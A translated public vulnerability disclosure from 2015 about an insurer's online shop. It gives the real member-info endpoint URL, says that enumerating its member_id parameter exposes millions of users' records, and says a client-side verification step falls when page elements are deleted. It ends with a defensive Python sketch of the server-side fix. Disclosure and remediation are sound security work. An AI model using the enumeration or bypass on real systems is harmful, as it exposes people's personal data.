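2015-08-15: Details reported to the vendor; waiting for the vendor to respond
2015-08-17: Vendor has confirmed; details disclosed to the vendor only
2015-08-27: Details disclosed to core white hats and experts in the relevant field
2015-09-06: Details disclosed to regular white hats
2015-09-16: Details disclosed to intern white hats
2015-10-01: Details disclosed to the public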
The ultimate tool... an API endpoint that is the ultimate tool!
http://shop.taikang.com/tkecs/service/memberinfo/init?&member_id=13888612&flow_id=1001
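Enumerating member_id yields the information of millions of users. You tell me whether the impact is serious!
Let's log in with an ID card number + password!
Login succeeded, but when visiting the personal center I found there is a verification step. We can break it like this!
Select the marked box and delete it!
There is one more layer; same method as above! Delete! Now it works normally!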
===========================================
Let's go back to that endpoint and enumerate it!
So many records... giving 20 rank isn't too much, right??
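Severity: High
Vulnerability Rank: 15
Confirmation time: 2015-08-17 11:49
Thank you very much for finding this and submitting it to us. We have assigned someone to handle it!
None yet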
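Both issues in the report (member records returned for whatever member_id is supplied, and a personal-center verification that is bypassed by deleting page elements) come down to checks that are missing on the server. The sketch below is an added example, not part of the original report or the vendor's code. It assumes a hypothetical Session type, a constructed in-memory store and an assumed allow-list of response fields; memberVerifyCode, memberAnswer and memberPassword are field names that appeared in the reported responses.

```python
from dataclasses import dataclass
from typing import Optional

# Constructed records (not real data). memberVerifyCode, memberAnswer and
# memberPassword are field names that appeared in the reported responses.
MEMBERS = {
    "1001": {"memberId": "1001", "memberType": "3", "address": "constructed address A",
             "memberVerifyCode": "000000", "memberAnswer": "constructed-hash",
             "memberPassword": "constructed-hash"},
    "1002": {"memberId": "1002", "memberType": "4", "address": "constructed address B",
             "memberVerifyCode": "111111", "memberAnswer": "constructed-hash",
             "memberPassword": "constructed-hash"},
}

# Assumed allow-list: only these fields are ever serialized to the client.
PUBLIC_FIELDS = ("memberId", "memberType", "address")


@dataclass
class Session:
    """Hypothetical server-side session; the client cannot edit either field."""
    member_id: Optional[str] = None   # set by the server at login
    verified: bool = False            # set by the server once the extra check passes


def member_info(session: Optional[Session], requested_member_id: str):
    """Return (status, body) for a member-info request."""
    if session is None or session.member_id is None:
        return 401, {"error": "login required"}
    # Ownership check before any lookup: existing and non-existing foreign ids
    # get the same answer, so the response is no oracle for valid ids.
    if str(requested_member_id) != session.member_id:
        return 403, {"error": "forbidden"}
    # Verification state is read from the session, not from the page, so
    # deleting the overlay in the browser does not change the outcome.
    if not session.verified:
        return 403, {"error": "verification required"}
    record = MEMBERS.get(session.member_id)
    if record is None:
        return 404, {"error": "not found"}
    return 200, {k: record[k] for k in PUBLIC_FIELDS if k in record}
```
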